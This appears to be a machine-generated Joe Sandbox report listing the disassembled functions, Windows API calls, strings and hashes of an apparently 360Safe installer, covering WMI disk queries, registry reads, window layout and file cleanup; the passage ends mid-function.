API ID: Item$Window$Show$H_prolog3InvalidateLongRect$EnableMessageRedrawSend
String ID: PNG
API String ID: 1363821098-364855578
Opcode ID: 55ce4ef89b8677c866b839a338de11c01577ccf30fff3ad7c1a405b789586da4
Instruction ID: 3379c3bcd86fd40938c55ce25d4f0166cd6043e1d6cf430f95c53cd74273ed19
Opcode Fuzzy Hash: 55ce4ef89b8677c866b839a338de11c01577ccf30fff3ad7c1a405b789586da4
Instruction Fuzzy Hash: 2DD15D70500B05AFDB25EB70CE96FEAB7A9AF04714F104A2CB16B661E2DF717A14CB11

Function 00AE3BFD Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 293
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 00AE3C04
CoCreateInstance.OLE32(00B3C868,00000000,00000001,00B3C798,?,00000038,00AE4568,?,?,?,?,?,0000001C,00ADEAD1,?,?), ref: 00AE3C22
SysFreeString.OLEAUT32(?), ref: 00AE3C71
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE3C88

Part of subcall function 00ACE782: __EH_prolog3_GS.LIBCMT ref: 00ACE789
Part of subcall function 00ACE782: _wcslen.LIBCMT ref: 00ACE7C4

Part of subcall function 00AD573A: SysAllocString.OLEAUT32(?), ref: 00AD5751

SysFreeString.OLEAUT32(?), ref: 00AE3D26
SysFreeString.OLEAUT32(?), ref: 00AE3D2F
VariantClear.OLEAUT32(?), ref: 00AE3D79
SysFreeString.OLEAUT32(?), ref: 00AE3E56
SysFreeString.OLEAUT32(?), ref: 00AE3E5B

Part of subcall function 00AE2533: __EH_prolog3.LIBCMT ref: 00AE253A
Part of subcall function 00AE2533: VariantInit.OLEAUT32(?), ref: 00AE2556
Part of subcall function 00AE2533: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 00AE256B
Part of subcall function 00AE2533: VariantClear.OLEAUT32(?), ref: 00AE2589

VariantClear.OLEAUT32(?), ref: 00AE3E98

Strings

Model, xrefs: 00AE3EAA
WQL, xrefs: 00AE3CF1, 00AE3E21
DeviceID, xrefs: 00AE3D8B
ROOT\CIMV2, xrefs: 00AE3C36
ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition, xrefs: 00AE3CC7
ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive, xrefs: 00AE3DF2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: String$FreeVariant$Clear$AllocBlanketChangeCreateH_prolog3H_prolog3_H_prolog3_catchInitInstanceProxyType_wcslen
String ID: ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive$ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition$DeviceID$Model$ROOT\CIMV2$WQL
API String ID: 3888685156-88420156
Opcode ID: 399be9746cc064170cb63a2d6824a2517043a9f3c24d05ee8e85aa887fcd8ed8
Instruction ID: f08073b42b500d549687d99c802193297299717df6b385fb95462f0dfa6e432e
Opcode Fuzzy Hash: 399be9746cc064170cb63a2d6824a2517043a9f3c24d05ee8e85aa887fcd8ed8
Instruction Fuzzy Hash: B7B10771900249EFDF00DFE4C989AEDBBB9AF08304F248499F505BB291CB75AE45CB61

Function 00AD08F0 Relevance: 25.7, APIs: 17, Instructions: 195
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00AD08F7
GetDlgItem.USER32(?,00000415), ref: 00AD0A0B
EnableWindow.USER32(00000000,00000000), ref: 00AD0A13
MoveWindow.USER32(?,00000048,00000095,0000003C,00000014,00000001,?,0000002C), ref: 00AD0A32
GetWindowRect.USER32(?,?), ref: 00AD0A3E
GetDlgItem.USER32(?,00000415), ref: 00AD0A59
SendMessageW.USER32(?,00000030,?,00000001), ref: 00AD0A71
MoveWindow.USER32(?,?,?,00000030,0000001A,00000001), ref: 00AD0AD3

Part of subcall function 00AD03BF: __EH_prolog3.LIBCMT ref: 00AD03C6

Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B

Part of subcall function 00AC1610: EnableWindow.USER32(?,?), ref: 00AC161B
Part of subcall function 00AC1610: InvalidateRect.USER32(?,00000000,00000001,?,?,00AA5AF9,?), ref: 00AC162A
Part of subcall function 00AC1610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00AA5AF9,?), ref: 00AC163C

MoveWindow.USER32(?,?,?,00000136,00000028,00000001), ref: 00AD0AEA
MoveWindow.USER32(?,?,?,00000050,00000014,00000001), ref: 00AD0B04
MoveWindow.USER32(?,?,?,0000008B,00000016,00000001), ref: 00AD0B25
ShowWindow.USER32(?,00000000), ref: 00AD0B3E
ShowWindow.USER32(?,00000000), ref: 00AD0B48
ShowWindow.USER32(?,00000000), ref: 00AD0B52
ShowWindow.USER32(?,00000000), ref: 00AD0B5C
GetDlgItem.USER32(?,00000415), ref: 00AD0B65
ShowWindow.USER32(00000000,00000000), ref: 00AD0B6E

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$MoveShow$Item$EnableH_prolog3Rect$InvalidateMessageRedrawSend_wcsnlen
String ID:
API String ID: 2541736847-0
Opcode ID: 79d470fdf9a176cb4f121ebee6a4d17fe737498965ea6926b4684b0888675ff3
Instruction ID: 1e419fa722e893c0fd942a06d925a3646900003cc8635680c266bb08bd4f88de
Opcode Fuzzy Hash: 79d470fdf9a176cb4f121ebee6a4d17fe737498965ea6926b4684b0888675ff3
Instruction Fuzzy Hash: 34714A70A40608AFDB21EBA4CD45FEEBBB5EF54304F144419F256BB2E2DBB06A40DB51

Function 00ADEA27 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00ADEA49

Part of subcall function 00AD87F5: _memset.LIBCMT ref: 00AD8838
Part of subcall function 00AD87F5: __wsplitpath.LIBCMT ref: 00AD8845
Part of subcall function 00AD87F5: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AD8874

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ADEA8E

Part of subcall function 00AE2080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00ADEAA4,?,?,00100000,00000000,0000008C), ref: 00AE20EE

_memset.LIBCMT ref: 00ADEC0A
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000001,00100000,00000000,0000008C), ref: 00ADEC1F
PathAppendW.SHLWAPI(?,360\360Safe), ref: 00ADEC2D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ADEC63
GetTickCount.KERNEL32 ref: 00ADED12

Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2

_memset.LIBCMT ref: 00ADED82
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000001), ref: 00ADED94
PathAppendW.SHLWAPI(00000000,360Safe), ref: 00ADED9F

Part of subcall function 00A9F087: std::_String_base::_Xlen.LIBCPMT ref: 00A9F09C

Part of subcall function 00A8A8EB: _wcsnlen.LIBCMT ref: 00A8A91D

Part of subcall function 00ADE951: __EH_prolog3.LIBCMT ref: 00ADE958

Part of subcall function 00ADE334: __EH_prolog3.LIBCMT ref: 00ADE33B

Strings

:\360Safe, xrefs: 00ADEE1B
360Safe, xrefs: 00ADED96
360\360Safe, xrefs: 00ADEC21

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Path$H_prolog3_memset$AppendFolderSpecialUnothrow_t@std@@@__ehfuncinfo$??2@$CountCriticalDiskException@8FreeInitializeSectionSpaceString_base::_ThrowTickXlen__wsplitpath_wcsnlenstd::_
String ID: 360Safe$360\360Safe$:\360Safe
API String ID: 1315137449-2735685471
Opcode ID: 281f1e62f357ae9fa267c8e151a3b8064541f32c71d3eee8ea9b8d13a80e5123
Instruction ID: 0803ae5ea7f2de6a61effeed736fd5b55fac8ef8ed40641b4f1fb43ed7075bf5
Opcode Fuzzy Hash: 281f1e62f357ae9fa267c8e151a3b8064541f32c71d3eee8ea9b8d13a80e5123
Instruction Fuzzy Hash: 96E18071D0021AABCF15FFA4CD56AFEB7B9AF08710F14442AF416BB291DB305A44CBA5

Function 00ACF9F1 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00ACFA10

Strings

\360Safe, xrefs: 00ACFC3A, 00ACFC3F, 00ACFC89
A:\, xrefs: 00ACFB0D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3
String ID: A:\$\360Safe
API String ID: 431132790-271697628
Opcode ID: 1ba103eeb7052105396da1120ddebf56f47f93284e65e91fa687db2e379d7620
Instruction ID: 810b5ef87524c375cca36b7f07bdff51345cb802a7dd033947f83ac8fd423345
Opcode Fuzzy Hash: 1ba103eeb7052105396da1120ddebf56f47f93284e65e91fa687db2e379d7620
Instruction Fuzzy Hash: 74A1EF746002049FDB24EB64DD5AFBEB7B6AF04344F12403EF96A9B2A6EB309D41C751

Function 00ADEF0D Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 205
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00ADEF2C

Part of subcall function 00AFAF4F: __wcstoi64.LIBCMT ref: 00AFAF2C

_memset.LIBCMT ref: 00ADEF75
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000000,?,?,00000018), ref: 00ADEF94
PathCombineW.SHLWAPI(00000000,00000000,?,360\360Safe,?,?,00000018), ref: 00ADEFBB
PathFileExistsW.SHLWAPI(?,00000000,?,?,00000018), ref: 00ADEFD0
PathIsDirectoryW.SHLWAPI(?), ref: 00ADEFDD
DeleteFileW.KERNEL32(?,?,?,00000018), ref: 00ADEFEA
PathIsDirectoryW.SHLWAPI(?), ref: 00ADF00A
PathIsDirectoryEmptyW.SHLWAPI(?), ref: 00ADF017
GetTickCount.KERNEL32 ref: 00ADF03B

Strings

360\360Safe, xrefs: 00ADEFA2
\360Safe, xrefs: 00ADF096, 00ADF09B, 00ADF0E0, 00ADF109

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Path$Directory$File$CombineCountDeleteEmptyExistsFolderH_prolog3SpecialTick__wcstoi64_memset
String ID: 360\360Safe$\360Safe
API String ID: 2943068809-3795500535
Opcode ID: 3e6428834aff7499f02a8350a814ede2d2a731cf54e357e5a73f2bdb37971d8b
Instruction ID: 922c8552269cdce537cdd5bc5539d66e7125ce846c4de365e9dc3290a8dcbd5e
Opcode Fuzzy Hash: 3e6428834aff7499f02a8350a814ede2d2a731cf54e357e5a73f2bdb37971d8b
Instruction Fuzzy Hash: CB716B71900109ABCB14FBA4CD56BFFB7B8AF14314F104529F526A72D2EF30AA08CB61

Function 00AF29E0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00AF2A1F
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,?,?,?), ref: 00AF2A3A
RegEnumKeyExA.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00B5CDA4,?,?,?,?), ref: 00AF2A6C
RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?,?,?,?), ref: 00AF2A96
RegQueryValueExA.KERNEL32 ref: 00AF2ACE
_memset.LIBCMT ref: 00AF2AE7

Part of subcall function 00AF28D0: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00AF291E

lstrcmpA.KERNEL32(?,00000000), ref: 00AF2B18
RegCloseKey.ADVAPI32(?), ref: 00AF2B63
RegEnumKeyExA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00AF2B89
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00AF2BA0

Strings

ServiceName, xrefs: 00AF2ABC
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 00AF2A30

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseEnumOpen_memset$CreateFileQueryValuelstrcmp
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
API String ID: 2630661138-1795789498
Opcode ID: b5ac57aea8b694d3496e34b0663b4a2411da7cc77847ccfe21196aa87dba546a
Instruction ID: f72cc60a3258ed6530e76d6e9c991831d59a200920b467eb62325df1e2205e35
Opcode Fuzzy Hash: b5ac57aea8b694d3496e34b0663b4a2411da7cc77847ccfe21196aa87dba546a
Instruction Fuzzy Hash: AC518171204345AFE724DF94CC86FBBB7E8AB88704F44491DFA9997190EB70E909C762

Function 6C5D6EE0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 114memorysynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(18AE8C58,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F26

Part of subcall function 6C5D6C60: _vswprintf_s.LIBCMT ref: 6C5D6C8A

CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F5B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F6E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F7E
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F9C
HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6FAD
__CxxThrowException@8.LIBCMT ref: 6C5D6FE7
__CxxThrowException@8.LIBCMT ref: 6C5D7011
ReleaseMutex.KERNEL32(00000000), ref: 6C5D7029
CloseHandle.KERNEL32(00000000), ref: 6C5D7034

Strings

%s %u, xrefs: 6C5D6F32
1830B7BD-F7A3-4c4d-989B-C004DE465EDE, xrefs: 6C5D6F2D

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Exception@8HeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vswprintf_s
String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
API String ID: 3526415198-332789905
Opcode ID: 35cba75b26384427c6aa1bc96c26626e8646aff41e0959c1bd6d94bde661d80f
Instruction ID: bff3d72318c3fa41a6911637b93f53e6067083e59dd5cc3a1e8f76cb7a1959d9
Opcode Fuzzy Hash: 35cba75b26384427c6aa1bc96c26626e8646aff41e0959c1bd6d94bde661d80f
Instruction Fuzzy Hash: 8B41D3B2A05309AFCB10EF68CCC4BEE77B4EB05304F014A6DE815E3680EF3459498B69

Function 00A94E4C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A94E50
TlsGetValue.KERNEL32(00000018), ref: 00A94E85
LoadLibraryW.KERNEL32(Cabinet.dll,?,771B3170), ref: 00A94EEA
GetProcAddress.KERNEL32(00000000,FDICreate), ref: 00A94F02
GetProcAddress.KERNEL32(?,FDICopy), ref: 00A94F15
GetProcAddress.KERNEL32(?,FDIIsCabinet), ref: 00A94F28
GetProcAddress.KERNEL32(?,FDIDestroy), ref: 00A94F3B

Strings

FDICopy, xrefs: 00A94F04
FDIDestroy, xrefs: 00A94F2A
FDIIsCabinet, xrefs: 00A94F17
FDICreate, xrefs: 00A94EF6
Cabinet.dll, xrefs: 00A94EE5

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: AddressProc$CurrentLibraryLoadThreadValue
String ID: Cabinet.dll$FDICopy$FDICreate$FDIDestroy$FDIIsCabinet
API String ID: 3141885424-2042144077
Opcode ID: 45ddef1e6d4bc9b43bd31ce2389551dd6d2a3f81a7f63437b01ff4e590484908
Instruction ID: 527008d76c5d2ed8ac53ad7c281a2c8f8d0f9c2f6ae82950d136567c7f1e21a6
Opcode Fuzzy Hash: 45ddef1e6d4bc9b43bd31ce2389551dd6d2a3f81a7f63437b01ff4e590484908
Instruction Fuzzy Hash: 74319074A40709AFDF349F75D845ED6BBE4FB08701B104D6EE66A93190DBB4A581CF80

Function 00AE22E0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 208comCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AE22E7
CoCreateInstance.OLE32(00B3C868,00000000,00000001,00B3C798,?,0000002C,00AE45AD,?,?,?,?,?,?,?,?,?), ref: 00AE2305
SysFreeString.OLEAUT32(?), ref: 00AE2364
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE2389
SysFreeString.OLEAUT32(?), ref: 00AE2405
SysFreeString.OLEAUT32(?), ref: 00AE240A
VariantClear.OLEAUT32(?), ref: 00AE2460

Strings

SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d', xrefs: 00AE23A6
WQL, xrefs: 00AE23D0
MediaType, xrefs: 00AE2472
Root\Microsoft\Windows\Storage, xrefs: 00AE232D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FreeString$BlanketClearCreateH_prolog3InstanceProxyVariant
String ID: MediaType$Root\Microsoft\Windows\Storage$SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d'$WQL
API String ID: 2951287799-4271271752
Opcode ID: c650914b1974db2e26dd256b42d05527ac9790e1eaa4b357899adf1760fc9fc0
Instruction ID: b05648151584882952f54f42e753275b5ed4e36005f17f37100e369de648b47d
Opcode Fuzzy Hash: c650914b1974db2e26dd256b42d05527ac9790e1eaa4b357899adf1760fc9fc0
Instruction Fuzzy Hash: 7D716F7190028AEFDF11DFE4C985EADBBB8EF48304F2484A9F515AB291C7749E45CB21

Function 00AD94CC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 146fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AD94EB
_wcslen.LIBCMT ref: 00AD9504
_memset.LIBCMT ref: 00AD9542

Part of subcall function 00AB6DCF: _vswprintf_s.LIBCMT ref: 00AB6E02

Part of subcall function 00ACD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD74A
Part of subcall function 00ACD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD767
Part of subcall function 00ACD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD77A

RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,0000000C), ref: 00AD9686

Part of subcall function 00ACEE1E: __EH_prolog3.LIBCMT ref: 00ACEE25

_memset.LIBCMT ref: 00AD95F1
_memset.LIBCMT ref: 00AD962F
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?,?,?,?,?,?,?,0000000C), ref: 00AD9656
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,00000010,?,?), ref: 00AD966A

Strings

%s\%s, xrefs: 00AD9577, 00AD9606, 00AD9644
%s\*.*, xrefs: 00AD9548

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File_memset$H_prolog3$DeleteDirectoryErrorFindFirstFullLastMoveNamePathRemove_vswprintf_s_wcslen
String ID: %s\%s$%s\*.*
API String ID: 2664728394-1665845743
Opcode ID: c8a4ab7a2da18856ab26af8812e910b8eac8137e7d81ea2820f755e8c4dea215
Instruction ID: 11c0aa63448be5603b2439abbc85a42d6ed9c19c1dce24f8e3e38b70fce24139
Opcode Fuzzy Hash: c8a4ab7a2da18856ab26af8812e910b8eac8137e7d81ea2820f755e8c4dea215
Instruction Fuzzy Hash: D951EE7191025DAADF24EFA4CE45BEF77ACEF08705F00442AB91D9B142EB74A7048B65

Function 00ADE7DF Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ADE7FE

Part of subcall function 00A9ECB6: __EH_prolog3.LIBCMT ref: 00A9ECBD

Part of subcall function 00ADE697: __EH_prolog3.LIBCMT ref: 00ADE69E

_memset.LIBCMT ref: 00ADE887
CreateFileW.KERNEL32(00000000,00120116,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE8D9
_wcslen.LIBCMT ref: 00ADE8EA
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE901
